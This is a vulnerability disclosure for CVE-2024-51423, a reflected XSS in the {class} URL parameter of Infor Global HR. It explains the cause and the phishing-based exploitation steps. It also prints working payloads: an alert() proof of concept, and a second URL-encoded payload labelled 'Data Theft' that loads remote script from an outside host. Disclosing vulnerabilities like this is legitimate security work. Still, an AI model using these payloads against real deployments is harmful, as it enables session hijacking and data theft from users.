âť—Reflected XSS

Infor Global HR v11.23.03.00.21 and prior is affected by Reflected XSS (AKA Non-Persistent or Type I) vulnerability.

Reflected XSS (authenticated)

CVE-2024-51423

Infor Global HR v11.23.03.00.21 and prior is affected by a Reflected XSS (AKA Non-Persistent or Type I) vulnerability via the {class} parameter in Error Message Rendering. Authentication is required.

https://example.com/lmhcm_in4prd1/soap/classes/{class}/lists/_generic

Description

A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in Infor Global HR v11.23.03.00.21 and prior versions. This vulnerability resides in the URL endpoint responsible for handling class lists. It occurs due to inadequate sanitization and improper handling of user-supplied input in the {class} parameter of the URL, which is reflected in server-generated error messages.

When an undefined or invalid {class} value is passed through the URL, the system attempts to load a non-existent class. As a result, the server generates an error message that includes the provided input without adequate sanitization or proper encoding. Consequently, attackers can inject arbitrary HTML or JavaScript code into this parameter, which, when reflected into the error message, will execute in the context of a user's browser, leading to a cross-site scripting (XSS) vulnerability.

This vulnerability allows attackers to execute malicious scripts, alter the user's interface, and potentially redirect users to malicious sites.

Exploitation

  • Modify the {class} parameter in the URL to include a malicious payload, such as JavaScript or HTML code.

  • Send the crafted URL to a victim via phishing, social engineering, or any other attack vector.

  • When the victim navigates to the modified URL, the application reflects the malicious input directly into the error message without sufficient sanitization.

  • The victim’s browser renders the injected payload in the error message, allowing arbitrary script execution within the victim's browser.

Example 1 - Simple JavaScript Alert Injection

Payload

<img src=a onerror=alert(1)>

URL Encoded Payload


https://example.com/lmhcm_in4prd1/soap/classes/%3cimg%20src%3da%20onerror%3dalert(1)%3e/lists/_generic

PoC

Executed Payload

Example 2 - Remote JavaScript Injection for Data Theft

Payload

<img src=x onerror=(function(){s=document.createElement('script');s.src='//xss.qa';document.body.appendChild(s)})();>

URL Encoded Payload

https://example.com/lmhcm_in4prd1/soap/classes/%3Cimg%20src=x%20onerror=%28function%28%29%7Bs%3Ddocument%2EcreateElement%28%27script%27%29%3Bs%2Esrc%3D%27%2F%2Fxss%2Eqa%27%3Bdocument%2Ebody%2EappendChild%28s%29%7D%29%28%29%3B%3E/lists/_generic

PoC

Executed Payload

Last updated